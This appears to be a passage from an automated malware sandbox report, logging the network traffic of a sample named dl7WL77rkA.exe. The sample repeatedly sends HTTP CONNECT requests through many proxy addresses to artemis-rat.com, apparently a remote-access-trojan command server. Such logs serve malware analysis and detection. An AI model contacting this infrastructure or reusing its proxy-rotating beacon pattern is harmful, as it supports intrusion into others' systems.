                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1578192.168.2.55423839.105.27.3031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.173779964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.593079090 CET38INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            content-length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1579192.168.2.552779118.174.143.3841533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.173804045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1580192.168.2.553517116.106.105.5510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.174478054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1581192.168.2.554218185.49.31.20780813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.174820900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1582192.168.2.55424343.131.242.162156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.175223112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1583192.168.2.554188103.156.232.8556783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.176071882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1584192.168.2.554340148.72.23.56423123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.176760912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1585192.168.2.554232185.132.242.21280833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.225980043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1586192.168.2.554234116.106.105.20810803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.227039099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1587192.168.2.55416293.126.56.3041533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.227039099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1588192.168.2.55436738.162.4.631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.227085114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.684267998 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1589192.168.2.554349162.241.6.97446073876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.227715015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1590192.168.2.55441123.94.123.20288883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.232094049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.771039009 CET84INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1591192.168.2.55415451.155.10.080003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.232095957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1592192.168.2.55418014.192.3.161823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.232172966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.998936892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.202102900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.594892979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389548063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.092747927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.904936075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1593192.168.2.5542478.219.228.100156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.232225895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1594192.168.2.5526068.210.8.157190013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.232322931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1595192.168.2.55439066.84.6.21626453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.233087063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796449900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514713049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014570951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.989487886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905316114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1596192.168.2.554203103.120.6.46803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238045931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.626554012 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1597192.168.2.554448104.19.124.112803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238090992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.398859978 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1598192.168.2.55284994.131.14.6610803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238595009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.998733997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1599192.168.2.55429445.120.178.19710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.243122101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1600192.168.2.552881148.72.209.174162033876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.252711058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1601192.168.2.554347147.75.92.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.259526014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
